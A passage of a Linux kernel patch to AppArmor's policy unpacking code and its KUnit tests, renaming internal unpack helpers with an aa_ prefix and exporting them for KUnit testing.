+ 
+ 	if (!res)
+@@ -432,6 +405,7 @@ static int unpack_strdup(struct aa_ext *e, char **string, const char *name)
+ 
+ 	return res;
+ }
++EXPORT_SYMBOL_IF_KUNIT(aa_unpack_strdup);
+ 
+ 
+ /**
+@@ -446,7 +420,7 @@ static struct aa_dfa *unpack_dfa(struct aa_ext *e)
+ 	size_t size;
+ 	struct aa_dfa *dfa = NULL;
+ 
+-	size = unpack_blob(e, &blob, "aadfa");
++	size = aa_unpack_blob(e, &blob, "aadfa");
+ 	if (size) {
+ 		/*
+ 		 * The dfa is aligned with in the blob to 8 bytes
+@@ -482,10 +456,10 @@ static bool unpack_trans_table(struct aa_ext *e, struct aa_profile *profile)
+ 	void *saved_pos = e->pos;
+ 
+ 	/* exec table is optional */
+-	if (unpack_nameX(e, AA_STRUCT, "xtable")) {
++	if (aa_unpack_nameX(e, AA_STRUCT, "xtable")) {
+ 		int i, size;
+ 
+-		size = unpack_array(e, NULL);
++		size = aa_unpack_array(e, NULL);
+ 		/* currently 4 exec bits and entries 0-3 are reserved iupcx */
+ 		if (size > 16 - 4)
+ 			goto fail;
+@@ -497,8 +471,8 @@ static bool unpack_trans_table(struct aa_ext *e, struct aa_profile *profile)
+ 		profile->file.trans.size = size;
+ 		for (i = 0; i < size; i++) {
+ 			char *str;
+-			int c, j, pos, size2 = unpack_strdup(e, &str, NULL);
+-			/* unpack_strdup verifies that the last character is
++			int c, j, pos, size2 = aa_unpack_strdup(e, &str, NULL);
++			/* aa_unpack_strdup verifies that the last character is
+ 			 * null termination byte.
+ 			 */
+ 			if (!size2)
+@@ -521,7 +495,7 @@ static bool unpack_trans_table(struct aa_ext *e, struct aa_profile *profile)
+ 					goto fail;
+ 				/* beginning with : requires an embedded \0,
+ 				 * verify that exactly 1 internal \0 exists
+-				 * trailing \0 already verified by unpack_strdup
++				 * trailing \0 already verified by aa_unpack_strdup
+ 				 *
+ 				 * convert \0 back to : for label_parse
+ 				 */
+@@ -533,9 +507,9 @@ static bool unpack_trans_table(struct aa_ext *e, struct aa_profile *profile)
+ 				/* fail - all other cases with embedded \0 */
+ 				goto fail;
+ 		}
+-		if (!unpack_nameX(e, AA_ARRAYEND, NULL))
++		if (!aa_unpack_nameX(e, AA_ARRAYEND, NULL))
+ 			goto fail;
+-		if (!unpack_nameX(e, AA_STRUCTEND, NULL))
++		if (!aa_unpack_nameX(e, AA_STRUCTEND, NULL))
+ 			goto fail;
+ 	}
+ 	return true;
+@@ -550,21 +524,21 @@ static bool unpack_xattrs(struct aa_ext *e, struct aa_profile *profile)
+ {
+ 	void *pos = e->pos;
+ 
+-	if (unpack_nameX(e, AA_STRUCT, "xattrs")) {
++	if (aa_unpack_nameX(e, AA_STRUCT, "xattrs")) {
+ 		int i, size;
+ 
+-		size = unpack_array(e, NULL);
++		size = aa_unpack_array(e, NULL);
+ 		profile->xattr_count = size;
+ 		profile->xattrs = kcalloc(size, sizeof(char *), GFP_KERNEL);
+ 		if (!profile->xattrs)
+ 			goto fail;
+ 		for (i = 0; i < size; i++) {
+-			if (!unpack_strdup(e, &profile->xattrs[i], NULL))
++			if (!aa_unpack_strdup(e, &profile->xattrs[i], NULL))
+ 				goto fail;
+ 		}
+-		if (!unpack_nameX(e, AA_ARRAYEND, NULL))
++		if (!aa_unpack_nameX(e, AA_ARRAYEND, NULL))
+ 			goto fail;
+-		if (!unpack_nameX(e, AA_STRUCTEND, NULL))
++		if (!aa_unpack_nameX(e, AA_STRUCTEND, NULL))
+ 			goto fail;
+ 	}
+ 
+@@ -580,8 +554,8 @@ static bool unpack_secmark(struct aa_ext *e, struct aa_profile *profile)
+ 	void *pos = e->pos;
+ 	int i, size;
+ 
+-	if (unpack_nameX(e, AA_STRUCT, "secmark")) {
+-		size = unpack_array(e, NULL);
++	if (aa_unpack_nameX(e, AA_STRUCT, "secmark")) {
++		size = aa_unpack_array(e, NULL);
+ 
+ 		profile->secmark = kcalloc(size, sizeof(struct aa_secmark),
+ 					   GFP_KERNEL);
+@@ -595,12 +569,12 @@ static bool unpack_secmark(struct aa_ext *e, struct aa_profile *profile)
+ 				goto fail;
+ 			if (!unpack_u8(e, &profile->secmark[i].deny, NULL))
+ 				goto fail;
+-			if (!unpack_strdup(e, &profile->secmark[i].label, NULL))
++			if (!aa_unpack_strdup(e, &profile->secmark[i].label, NULL))
+ 				goto fail;
+ 		}
+-		if (!unpack_nameX(e, AA_ARRAYEND, NULL))
++		if (!aa_unpack_nameX(e, AA_ARRAYEND, NULL))
+ 			goto fail;
+-		if (!unpack_nameX(e, AA_STRUCTEND, NULL))
++		if (!aa_unpack_nameX(e, AA_STRUCTEND, NULL))
+ 			goto fail;
+ 	}
+ 
+@@ -624,26 +598,26 @@ static bool unpack_rlimits(struct aa_ext *e, struct aa_profile *profile)
+ 	void *pos = e->pos;
+ 
+ 	/* rlimits are optional */
+-	if (unpack_nameX(e, AA_STRUCT, "rlimits")) {
++	if (aa_unpack_nameX(e, AA_STRUCT, "rlimits")) {
+ 		int i, size;
+ 		u32 tmp = 0;
+-		if (!unpack_u32(e, &tmp, NULL))
++		if (!aa_unpack_u32(e, &tmp, NULL))
+ 			goto fail;
+ 		profile->rlimits.mask = tmp;
+ 
+-		size = unpack_array(e, NULL);
++		size = aa_unpack_array(e, NULL);
+ 		if (size > RLIM_NLIMITS)
+ 			goto fail;
+ 		for (i = 0; i < size; i++) {
+ 			u64 tmp2 = 0;
+ 			int a = aa_map_resource(i);
+-			if (!unpack_u64(e, &tmp2, NULL))
++			if (!aa_unpack_u64(e, &tmp2, NULL))
+ 				goto fail;
+ 			profile->rlimits.limits[a].rlim_max = tmp2;
+ 		}
+-		if (!unpack_nameX(e, AA_ARRAYEND, NULL))
++		if (!aa_unpack_nameX(e, AA_ARRAYEND, NULL))
+ 			goto fail;
+-		if (!unpack_nameX(e, AA_STRUCTEND, NULL))
++		if (!aa_unpack_nameX(e, AA_STRUCTEND, NULL))
+ 			goto fail;
+ 	}
+ 	return true;
+@@ -682,7 +656,7 @@ static struct aa_profile *unpack_profile(struct aa_ext *e, char **ns_name)
+ 	const char *info = "failed to unpack profile";
+ 	size_t ns_len;
+ 	struct rhashtable_params params = { 0 };
+-	char *key = NULL;
++	char *key = NULL, *disconnected = NULL;
+ 	struct aa_data *data;
+ 	int i, error = -EPROTO;
+ 	kernel_cap_t tmpcap;
+@@ -691,9 +665,9 @@ static struct aa_profile *unpack_profile(struct aa_ext *e, char **ns_name)
+ 	*ns_name = NULL;
+ 
+ 	/* check that we have the right struct being passed */
+-	if (!unpack_nameX(e, AA_STRUCT, "profile"))
++	if (!aa_unpack_nameX(e, AA_STRUCT, "profile"))
+ 		goto fail;
+-	if (!unpack_str(e, &name, NULL))
++	if (!aa_unpack_str(e, &name, NULL))
+ 		goto fail;
+ 	if (*name == '\0')
+ 		goto fail;
+@@ -713,10 +687,10 @@ static struct aa_profile *unpack_profile(struct aa_ext *e, char **ns_name)
+ 		return ERR_PTR(-ENOMEM);
+ 
+ 	/* profile renaming is optional */
+-	(void) unpack_str(e, &profile->rename, "rename");
++	(void) aa_unpack_str(e, &profile->rename, "rename");
+ 
+ 	/* attachment string is optional */
+-	(void) unpack_str(e, &profile->attach, "attach");
++	(void) aa_unpack_str(e, &profile->attach, "attach");
+ 
+ 	/* xmatch is optional and may be NULL */
+ 	profile->xmatch = unpack_dfa(e);
+@@ -728,7 +702,7 @@ static struct aa_profile *unpack_profile(struct aa_ext *e, char **ns_name)
+ 	}
+ 	/* xmatch_len is not optional if xmatch is set */
+ 	if (profile->xmatch) {
+-		if (!unpack_u32(e, &tmp, NULL)) {
++		if (!aa_unpack_u32(e, &tmp, NULL)) {
+ 			info = "missing xmatch len";
+ 			goto fail;
+ 		}
+@@ -736,15 +710,16 @@ static struct aa_profile *unpack_profile(struct aa_ext *e, char **ns_name)
+ 	}
+ 
+ 	/* disconnected attachment string is optional */
+-	(void) unpack_str(e, &profile->disconnected, "disconnected");
++	(void) aa_unpack_strdup(e, &disconnected, "disconnected");
++	profile->disconnected = disconnected;
+ 
+ 	/* per profile debug flags (complain, audit) */
+-	if (!unpack_nameX(e, AA_STRUCT, "flags")) {
++	if (!aa_unpack_nameX(e, AA_STRUCT, "flags")) {
+ 		info = "profile missing flags";
+ 		goto fail;
+ 	}
+ 	info = "failed to unpack profile flags";
+-	if (!unpack_u32(e, &tmp, NULL))
++	if (!aa_unpack_u32(e, &tmp, NULL))
+ 		goto fail;
+ 	if (tmp & PACKED_FLAG_HAT)
+ 		profile->label.flags |= FLAG_HAT;
+@@ -752,7 +727,7 @@ static struct aa_profile *unpack_profile(struct aa_ext *e, char **ns_name)
+ 		profile->label.flags |= FLAG_DEBUG1;
+ 	if (tmp & PACKED_FLAG_DEBUG2)
+ 		profile->label.flags |= FLAG_DEBUG2;
+-	if (!unpack_u32(e, &tmp, NULL))
++	if (!aa_unpack_u32(e, &tmp, NULL))
+ 		goto fail;
+ 	if (tmp == PACKED_MODE_COMPLAIN || (e->version & FORCE_COMPLAIN_FLAG)) {
+ 		profile->mode = APPARMOR_COMPLAIN;
+@@ -766,16 +741,16 @@ static struct aa_profile *unpack_profile(struct aa_ext *e, char **ns_name)
+ 	} else {
+ 		goto fail;
+ 	}
+-	if (!unpack_u32(e, &tmp, NULL))
++	if (!aa_unpack_u32(e, &tmp, NULL))
+ 		goto fail;
+ 	if (tmp)
+ 		profile->audit = AUDIT_ALL;
+ 
+-	if (!unpack_nameX(e, AA_STRUCTEND, NULL))
++	if (!aa_unpack_nameX(e, AA_STRUCTEND, NULL))
+ 		goto fail;
+ 
+ 	/* path_flags is optional */
+-	if (unpack_u32(e, &profile->path_flags, "path_flags"))
++	if (aa_unpack_u32(e, &profile->path_flags, "path_flags"))
+ 		profile->path_flags |= profile->label.flags &
+ 			PATH_MEDIATE_DELETED;
+ 	else
+@@ -783,38 +758,38 @@ static struct aa_profile *unpack_profile(struct aa_ext *e, char **ns_name)
+ 		profile->path_flags = PATH_MEDIATE_DELETED;
+ 
+ 	info = "failed to unpack profile capabilities";
+-	if (!unpack_u32(e, &(profile->caps.allow.cap[0]), NULL))
++	if (!aa_unpack_u32(e, &(profile->caps.allow.cap[0]), NULL))
+ 		goto fail;
+-	if (!unpack_u32(e, &(profile->caps.audit.cap[0]), NULL))
++	if (!aa_unpack_u32(e, &(profile->caps.audit.cap[0]), NULL))
+ 		goto fail;
+-	if (!unpack_u32(e, &(profile->caps.quiet.cap[0]), NULL))
++	if (!aa_unpack_u32(e, &(profile->caps.quiet.cap[0]), NULL))
+ 		goto fail;
+-	if (!unpack_u32(e, &tmpcap.cap[0], NULL))
++	if (!aa_unpack_u32(e, &tmpcap.cap[0], NULL))
+ 		goto fail;
+ 
+ 	info = "failed to unpack upper profile capabilities";
+-	if (unpack_nameX(e, AA_STRUCT, "caps64")) {
++	if (aa_unpack_nameX(e, AA_STRUCT, "caps64")) {
+ 		/* optional upper half of 64 bit caps */
+-		if (!unpack_u32(e, &(profile->caps.allow.cap[1]), NULL))
++		if (!aa_unpack_u32(e, &(profile->caps.allow.cap[1]), NULL))
+ 			goto fail;
+-		if (!unpack_u32(e, &(profile->caps.audit.cap[1]), NULL))
++		if (!aa_unpack_u32(e, &(profile->caps.audit.cap[1]), NULL))
+ 			goto fail;
+-		if (!unpack_u32(e, &(profile->caps.quiet.cap[1]), NULL))
++		if (!aa_unpack_u32(e, &(profile->caps.quiet.cap[1]), NULL))
+ 			goto fail;
+-		if (!unpack_u32(e, &(tmpcap.cap[1]), NULL))
++		if (!aa_unpack_u32(e, &(tmpcap.cap[1]), NULL))
+ 			goto fail;
+-		if (!unpack_nameX(e, AA_STRUCTEND, NULL))
++		if (!aa_unpack_nameX(e, AA_STRUCTEND, NULL))
+ 			goto fail;
+ 	}
+ 
+ 	info = "failed to unpack extended profile capabilities";
+-	if (unpack_nameX(e, AA_STRUCT, "capsx")) {
++	if (aa_unpack_nameX(e, AA_STRUCT, "capsx")) {
+ 		/* optional extended caps mediation mask */
+-		if (!unpack_u32(e, &(profile->caps.extended.cap[0]), NULL))
++		if (!aa_unpack_u32(e, &(profile->caps.extended.cap[0]), NULL))
+ 			goto fail;
+-		if (!unpack_u32(e, &(profile->caps.extended.cap[1]), NULL))
++		if (!aa_unpack_u32(e, &(profile->caps.extended.cap[1]), NULL))
+ 			goto fail;
+-		if (!unpack_nameX(e, AA_STRUCTEND, NULL))
++		if (!aa_unpack_nameX(e, AA_STRUCTEND, NULL))
+ 			goto fail;
+ 	}
+ 
+@@ -833,7 +808,7 @@ static struct aa_profile *unpack_profile(struct aa_ext *e, char **ns_name)
+ 		goto fail;
+ 	}
+ 
+-	if (unpack_nameX(e, AA_STRUCT, "policydb")) {
++	if (aa_unpack_nameX(e, AA_STRUCT, "policydb")) {
+ 		/* generic policy dfa - optional and may be NULL */
+ 		info = "failed to unpack policydb";
+ 		profile->policy.dfa = unpack_dfa(e);
+@@ -845,7 +820,7 @@ static struct aa_profile *unpack_profile(struct aa_ext *e, char **ns_name)
+ 			error = -EPROTO;
+ 			goto fail;
+ 		}
+-		if (!unpack_u32(e, &profile->policy.start[0], "start"))
++		if (!aa_unpack_u32(e, &profile->policy.start[0], "start"))
+ 			/* default start state */
+ 			profile->policy.start[0] = DFA_START;
+ 		/* setup class index */
+@@ -855,7 +830,7 @@ static struct aa_profile *unpack_profile(struct aa_ext *e, char **ns_name)
+ 					    profile->policy.start[0],
+ 					    i);
+ 		}
+-		if (!unpack_nameX(e, AA_STRUCTEND, NULL))
++		if (!aa_unpack_nameX(e, AA_STRUCTEND, NULL))
+ 			goto fail;
+ 	} else
+ 		profile->policy.dfa = aa_get_dfa(nulldfa);
+@@ -868,7 +843,7 @@ static struct aa_profile *unpack_profile(struct aa_ext *e, char **ns_name)
+ 		info = "failed to unpack profile file rules";
+ 		goto fail;
+ 	} else if (profile->file.dfa) {
+-		if (!unpack_u32(e, &profile->file.start, "dfa_start"))
++		if (!aa_unpack_u32(e, &profile->file.start, "dfa_start"))
+ 			/* default start state */
+ 			profile->file.start = DFA_START;
+ 	} else if (profile->policy.dfa &&
+@@ -883,7 +858,7 @@ static struct aa_profile *unpack_profile(struct aa_ext *e, char **ns_name)
+ 		goto fail;
+ 	}
+ 
+-	if (unpack_nameX(e, AA_STRUCT, "data")) {
++	if (aa_unpack_nameX(e, AA_STRUCT, "data")) {
+ 		info = "out of memory";
+ 		profile->data = kzalloc(sizeof(*profile->data), GFP_KERNEL);
+ 		if (!profile->data)
+@@ -901,7 +876,7 @@ static struct aa_profile *unpack_profile(struct aa_ext *e, char **ns_name)
+ 			goto fail;
+ 		}
+ 
+-		while (unpack_strdup(e, &key, NULL)) {
++		while (aa_unpack_strdup(e, &key, NULL)) {
+ 			data = kzalloc(sizeof(*data), GFP_KERNEL);
+ 			if (!data) {
+ 				kfree_sensitive(key);
+@@ -909,7 +884,7 @@ static struct aa_profile *unpack_profile(struct aa_ext *e, char **ns_name)
+ 			}
+ 
+ 			data->key = key;
+-			data->size = unpack_blob(e, &data->data, NULL);
++			data->size = aa_unpack_blob(e, &data->data, NULL);
+ 			data->data = kvmemdup(data->data, data->size);
+ 			if (data->size && !data->data) {
+ 				kfree_sensitive(data->key);
+@@ -926,13 +901,13 @@ static struct aa_profile *unpack_profile(struct aa_ext *e, char **ns_name)
+ 			}
+ 		}
+ 
+-		if (!unpack_nameX(e, AA_STRUCTEND, NULL)) {
++		if (!aa_unpack_nameX(e, AA_STRUCTEND, NULL)) {
+ 			info = "failed to unpack end of key, value data table";
+ 			goto fail;
+ 		}
+ 	}
+ 
+-	if (!unpack_nameX(e, AA_STRUCTEND, NULL)) {
++	if (!aa_unpack_nameX(e, AA_STRUCTEND, NULL)) {
+ 		info = "failed to unpack end of profile";
+ 		goto fail;
+ 	}
+@@ -965,7 +940,7 @@ static int verify_header(struct aa_ext *e, int required, const char **ns)
+ 	*ns = NULL;
+ 
+ 	/* get the interface version */
+-	if (!unpack_u32(e, &e->version, "version")) {
++	if (!aa_unpack_u32(e, &e->version, "version")) {
+ 		if (required) {
+ 			audit_iface(NULL, NULL, NULL, "invalid profile format",
+ 				    e, error);
+@@ -984,7 +959,7 @@ static int verify_header(struct aa_ext *e, int required, const char **ns)
+ 	}
+ 
+ 	/* read the namespace if present */
+-	if (unpack_str(e, &name, "namespace")) {
++	if (aa_unpack_str(e, &name, "namespace")) {
+ 		if (*name == '\0') {
+ 			audit_iface(NULL, NULL, NULL, "invalid namespace name",
+ 				    e, error);
+@@ -1256,7 +1231,3 @@ fail:
+ 
+ 	return error;
+ }
+-
+-#ifdef CONFIG_SECURITY_APPARMOR_KUNIT_TEST
+-#include "policy_unpack_test.c"
+-#endif /* CONFIG_SECURITY_APPARMOR_KUNIT_TEST */
+diff --git a/security/apparmor/policy_unpack_test.c b/security/apparmor/policy_unpack_test.c
+index 0a969b2e03dba..f25cf2a023d57 100644
+--- a/security/apparmor/policy_unpack_test.c
++++ b/security/apparmor/policy_unpack_test.c
+@@ -4,6 +4,7 @@
+  */
+ 
+ #include <kunit/test.h>
++#include <kunit/visibility.h>
+ 
+ #include "include/policy.h"
+ #include "include/policy_unpack.h"
+@@ -43,6 +44,8 @@
+ #define TEST_ARRAY_BUF_OFFSET \
+ 	(TEST_NAMED_ARRAY_BUF_OFFSET + 3 + strlen(TEST_ARRAY_NAME) + 1)
+ 
++MODULE_IMPORT_NS(EXPORTED_FOR_KUNIT_TESTING);
++
+ struct policy_unpack_fixture {
+ 	struct aa_ext *e;
+ 	size_t e_size;
+@@ -125,16 +128,16 @@ static void policy_unpack_test_inbounds_when_inbounds(struct kunit *test)
+ {
+ 	struct policy_unpack_fixture *puf = test->priv;
+ 
+-	KUNIT_EXPECT_TRUE(test, inbounds(puf->e, 0));
+-	KUNIT_EXPECT_TRUE(test, inbounds(puf->e, puf->e_size / 2));
+-	KUNIT_EXPECT_TRUE(test, inbounds(puf->e, puf->e_size));
++	KUNIT_EXPECT_TRUE(test, aa_inbounds(puf->e, 0));
++	KUNIT_EXPECT_TRUE(test, aa_inbounds(puf->e, puf->e_size / 2));
++	KUNIT_EXPECT_TRUE(test, aa_inbounds(puf->e, puf->e_size));
+ }
+ 
+ static void policy_unpack_test_inbounds_when_out_of_bounds(struct kunit *test)
+ {
+ 	struct policy_unpack_fixture *puf = test->priv;
+ 
+-	KUNIT_EXPECT_FALSE(test, inbounds(puf->e, puf->e_size + 1));
++	KUNIT_EXPECT_FALSE(test, aa_inbounds(puf->e, puf->e_size + 1));
+ }
+ 
+ static void policy_unpack_test_unpack_array_with_null_name(struct kunit *test)
+@@ -144,7 +147,7 @@ static void policy_unpack_test_unpack_array_with_null_name(struct kunit *test)
+ 
+ 	puf->e->pos += TEST_ARRAY_BUF_OFFSET;
+ 
+-	array_size = unpack_array(puf->e, NULL);
++	array_size = aa_unpack_array(puf->e, NULL);
+ 
+ 	KUNIT_EXPECT_EQ(test, array_size, (u16)TEST_ARRAY_SIZE);
+ 	KUNIT_EXPECT_PTR_EQ(test, puf->e->pos,
+@@ -159,7 +162,7 @@ static void policy_unpack_test_unpack_array_with_name(struct kunit *test)
+ 
+ 	puf->e->pos += TEST_NAMED_ARRAY_BUF_OFFSET;
+ 
+-	array_size = unpack_array(puf->e, name);
++	array_size = aa_unpack_array(puf->e, name);
+ 
+ 	KUNIT_EXPECT_EQ(test, array_size, (u16)TEST_ARRAY_SIZE);
+ 	KUNIT_EXPECT_PTR_EQ(test, puf->e->pos,
+@@ -175,7 +178,7 @@ static void policy_unpack_test_unpack_array_out_of_bounds(struct kunit *test)
+ 	puf->e->pos += TEST_NAMED_ARRAY_BUF_OFFSET;
+ 	puf->e->end = puf->e->start + TEST_ARRAY_BUF_OFFSET + sizeof(u16);
+ 
+-	array_size = unpack_array(puf->e, name);
++	array_size = aa_unpack_array(puf->e, name);
+ 
+ 	KUNIT_EXPECT_EQ(test, array_size, 0);
+ 	KUNIT_EXPECT_PTR_EQ(test, puf->e->pos,
+@@ -189,7 +192,7 @@ static void policy_unpack_test_unpack_blob_with_null_name(struct kunit *test)
+ 	size_t size;
+ 
+ 	puf->e->pos += TEST_BLOB_BUF_OFFSET;
+-	size = unpack_blob(puf->e, &blob, NULL);
++	size = aa_unpack_blob(puf->e, &blob, NULL);
+ 
+ 	KUNIT_ASSERT_EQ(test, size, TEST_BLOB_DATA_SIZE);
+ 	KUNIT_EXPECT_TRUE(test,
+@@ -203,7 +206,7 @@ static void policy_unpack_test_unpack_blob_with_name(struct kunit *test)
+ 	size_t size;
+ 
+ 	puf->e->pos += TEST_NAMED_BLOB_BUF_OFFSET;
+-	size = unpack_blob(puf->e, &blob, TEST_BLOB_NAME);
++	size = aa_unpack_blob(puf->e, &blob, TEST_BLOB_NAME);
+ 
+ 	KUNIT_ASSERT_EQ(test, size, TEST_BLOB_DATA_SIZE);
+ 	KUNIT_EXPECT_TRUE(test,
+@@ -222,7 +225,7 @@ static void policy_unpack_test_unpack_blob_out_of_bounds(struct kunit *test)
+ 	puf->e->end = puf->e->start + TEST_BLOB_BUF_OFFSET
+ 		+ TEST_BLOB_DATA_SIZE - 1;
+ 
+-	size = unpack_blob(puf->e, &blob, TEST_BLOB_NAME);
++	size = aa_unpack_blob(puf->e, &blob, TEST_BLOB_NAME);
+ 
+ 	KUNIT_EXPECT_EQ(test, size, 0);
+ 	KUNIT_EXPECT_PTR_EQ(test, puf->e->pos, start);
+@@ -235,7 +238,7 @@ static void policy_unpack_test_unpack_str_with_null_name(struct kunit *test)
+ 	size_t size;
+ 
+ 	puf->e->pos += TEST_STRING_BUF_OFFSET;
+-	size = unpack_str(puf->e, &string, NULL);
++	size = aa_unpack_str(puf->e, &string, NULL);
+ 
+ 	KUNIT_EXPECT_EQ(test, size, strlen(TEST_STRING_DATA) + 1);
+ 	KUNIT_EXPECT_STREQ(test, string, TEST_STRING_DATA);
+@@ -247,7 +250,7 @@ static void policy_unpack_test_unpack_str_with_name(struct kunit *test)
+ 	const char *string = NULL;
+ 	size_t size;
+ 
+-	size = unpack_str(puf->e, &string, TEST_STRING_NAME);
++	size = aa_unpack_str(puf->e, &string, TEST_STRING_NAME);
+ 
+ 	KUNIT_EXPECT_EQ(test, size, strlen(TEST_STRING_DATA) + 1);
+ 	KUNIT_EXPECT_STREQ(test, string, TEST_STRING_DATA);
+@@ -263,7 +266,7 @@ static void policy_unpack_test_unpack_str_out_of_bounds(struct kunit *test)
+ 	puf->e->end = puf->e->pos + TEST_STRING_BUF_OFFSET
+ 		+ strlen(TEST_STRING_DATA) - 1;
+ 
+-	size = unpack_str(puf->e, &string, TEST_STRING_NAME);
++	size = aa_unpack_str(puf->e, &string, TEST_STRING_NAME);
+ 
+ 	KUNIT_EXPECT_EQ(test, size, 0);
+ 	KUNIT_EXPECT_PTR_EQ(test, puf->e->pos, start);
+@@ -276,7 +279,7 @@ static void policy_unpack_test_unpack_strdup_with_null_name(struct kunit *test)
+ 	size_t size;
+ 
+ 	puf->e->pos += TEST_STRING_BUF_OFFSET;
+-	size = unpack_strdup(puf->e, &string, NULL);
++	size = aa_unpack_strdup(puf->e, &string, NULL);
+ 
+ 	KUNIT_EXPECT_EQ(test, size, strlen(TEST_STRING_DATA) + 1);
+ 	KUNIT_EXPECT_FALSE(test,
+@@ -291,7 +294,7 @@ static void policy_unpack_test_unpack_strdup_with_name(struct kunit *test)
+ 	char *string = NULL;
+ 	size_t size;
+ 
+-	size = unpack_strdup(puf->e, &string, TEST_STRING_NAME);
++	size = aa_unpack_strdup(puf->e, &string, TEST_STRING_NAME);
+ 
+ 	KUNIT_EXPECT_EQ(test, size, strlen(TEST_STRING_DATA) + 1);
+ 	KUNIT_EXPECT_FALSE(test,
+@@ -310,7 +313,7 @@ static void policy_unpack_test_unpack_strdup_out_of_bounds(struct kunit *test)
+ 	puf->e->end = puf->e->pos + TEST_STRING_BUF_OFFSET
+ 		+ strlen(TEST_STRING_DATA) - 1;
+ 
+-	size = unpack_strdup(puf->e, &string, TEST_STRING_NAME);
++	size = aa_unpack_strdup(puf->e, &string, TEST_STRING_NAME);
+ 
+ 	KUNIT_EXPECT_EQ(test, size, 0);
+ 	KUNIT_EXPECT_NULL(test, string);
+@@ -324,7 +327,7 @@ static void policy_unpack_test_unpack_nameX_with_null_name(struct kunit *test)
+ 
+ 	puf->e->pos += TEST_U32_BUF_OFFSET;
+ 
+-	success = unpack_nameX(puf->e, AA_U32, NULL);
++	success = aa_unpack_nameX(puf->e, AA_U32, NULL);
+ 
+ 	KUNIT_EXPECT_TRUE(test, success);
+ 	KUNIT_EXPECT_PTR_EQ(test, puf->e->pos,
+@@ -338,7 +341,7 @@ static void policy_unpack_test_unpack_nameX_with_wrong_code(struct kunit *test)
+ 
+ 	puf->e->pos += TEST_U32_BUF_OFFSET;
+ 
+-	success = unpack_nameX(puf->e, AA_BLOB, NULL);
++	success = aa_unpack_nameX(puf->e, AA_BLOB, NULL);
+ 
+ 	KUNIT_EXPECT_FALSE(test, success);
+ 	KUNIT_EXPECT_PTR_EQ(test, puf->e->pos,
+@@ -353,7 +356,7 @@ static void policy_unpack_test_unpack_nameX_with_name(struct kunit *test)
+ 
+ 	puf->e->pos += TEST_NAMED_U32_BUF_OFFSET;
+ 
+-	success = unpack_nameX(puf->e, AA_U32, name);
++	success = aa_unpack_nameX(puf->e, AA_U32, name);
+ 
+ 	KUNIT_EXPECT_TRUE(test, success);
+ 	KUNIT_EXPECT_PTR_EQ(test, puf->e->pos,
+@@ -368,7 +371,7 @@ static void policy_unpack_test_unpack_nameX_with_wrong_name(struct kunit *test)
+ 
+ 	puf->e->pos += TEST_NAMED_U32_BUF_OFFSET;
+ 
+-	success = unpack_nameX(puf->e, AA_U32, name);
++	success = aa_unpack_nameX(puf->e, AA_U32, name);
+ 
+ 	KUNIT_EXPECT_FALSE(test, success);
+ 	KUNIT_EXPECT_PTR_EQ(test, puf->e->pos,
+@@ -389,7 +392,7 @@ static void policy_unpack_test_unpack_u16_chunk_basic(struct kunit *test)
+ 	 */
+ 	puf->e->end += TEST_U16_DATA;
+ 
+-	size = unpack_u16_chunk(puf->e, &chunk);
++	size = aa_unpack_u16_chunk(puf->e, &chunk);
+ 
+ 	KUNIT_EXPECT_PTR_EQ(test, chunk,
+ 			    puf->e->start + TEST_U16_OFFSET + 2);
+@@ -406,7 +409,7 @@ static void policy_unpack_test_unpack_u16_chunk_out_of_bounds_1(
+ 
+ 	puf->e->pos = puf->e->end - 1;
+ 
+-	size = unpack_u16_chunk(puf->e, &chunk);
++	size = aa_unpack_u16_chunk(puf->e, &chunk);
+ 
+ 	KUNIT_EXPECT_EQ(test, size, 0);
+ 	KUNIT_EXPECT_NULL(test, chunk);
+@@ -428,7 +431,7 @@ static void policy_unpack_test_unpack_u16_chunk_out_of_bounds_2(
+ 	 */
+ 	puf->e->end = puf->e->pos + TEST_U16_DATA - 1;
+ 
+-	size = unpack_u16_chunk(puf->e, &chunk);
++	size = aa_unpack_u16_chunk(puf->e, &chunk);
+ 
+ 	KUNIT_EXPECT_EQ(test, size, 0);
+ 	KUNIT_EXPECT_NULL(test, chunk);
+@@ -443,7 +446,7 @@ static void policy_unpack_test_unpack_u32_with_null_name(struct kunit *test)
+ 
+ 	puf->e->pos += TEST_U32_BUF_OFFSET;
+ 
+-	success = unpack_u32(puf->e, &data, NULL);
++	success = aa_unpack_u32(puf->e, &data, NULL);
+ 
+ 	KUNIT_EXPECT_TRUE(test, success);
+ 	KUNIT_EXPECT_EQ(test, data, TEST_U32_DATA);
+@@ -460,7 +463,7 @@ static void policy_unpack_test_unpack_u32_with_name(struct kunit *test)
+ 
+ 	puf->e->pos += TEST_NAMED_U32_BUF_OFFSET;
+ 
+-	success = unpack_u32(puf->e, &data, name);
++	success = aa_unpack_u32(puf->e, &data, name);
+ 
+ 	KUNIT_EXPECT_TRUE(test, success);
+ 	KUNIT_EXPECT_EQ(test, data, TEST_U32_DATA);
+@@ -478,7 +481,7 @@ static void policy_unpack_test_unpack_u32_out_of_bounds(struct kunit *test)
+ 	puf->e->pos += TEST_NAMED_U32_BUF_OFFSET;
+ 	puf->e->end = puf->e->start + TEST_U32_BUF_OFFSET + sizeof(u32);
+ 
+-	success = unpack_u32(puf->e, &data, name);
++	success = aa_unpack_u32(puf->e, &data, name);
+ 
+ 	KUNIT_EXPECT_FALSE(test, success);
+ 	KUNIT_EXPECT_PTR_EQ(test, puf->e->pos,
+@@ -493,7 +496,7 @@ static void policy_unpack_test_unpack_u64_with_null_name(struct kunit *test)
+ 
+ 	puf->e->pos += TEST_U64_BUF_OFFSET;
+ 
+-	success = unpack_u64(puf->e, &data, NULL);
++	success = aa_unpack_u64(puf->e, &data, NULL);
+ 
+ 	KUNIT_EXPECT_TRUE(test, success);
+ 	KUNIT_EXPECT_EQ(test, data, TEST_U64_DATA);
+@@ -510,7 +513,7 @@ static void policy_unpack_test_unpack_u64_with_name(struct kunit *test)
+ 
+ 	puf->e->pos += TEST_NAMED_U64_BUF_OFFSET;
+ 
+-	success = unpack_u64(puf->e, &data, name);
++	success = aa_unpack_u64(puf->e, &data, name);
+ 
+ 	KUNIT_EXPECT_TRUE(test, success);
+ 	KUNIT_EXPECT_EQ(test, data, TEST_U64_DATA);
+@@ -528,7 +531,7 @@ static void policy_unpack_test_unpack_u64_out_of_bounds(struct kunit *test)
+ 	puf->e->pos += TEST_NAMED_U64_BUF_OFFSET;
+ 	puf->e->end = puf->e->start + TEST_U64_BUF_OFFSET + sizeof(u64);
+ 
+-	success = unpack_u64(puf->e, &data, name);
++	success = aa_unpack_u64(puf->e, &data, name);
+ 
+ 	KUNIT_EXPECT_FALSE(test, success);
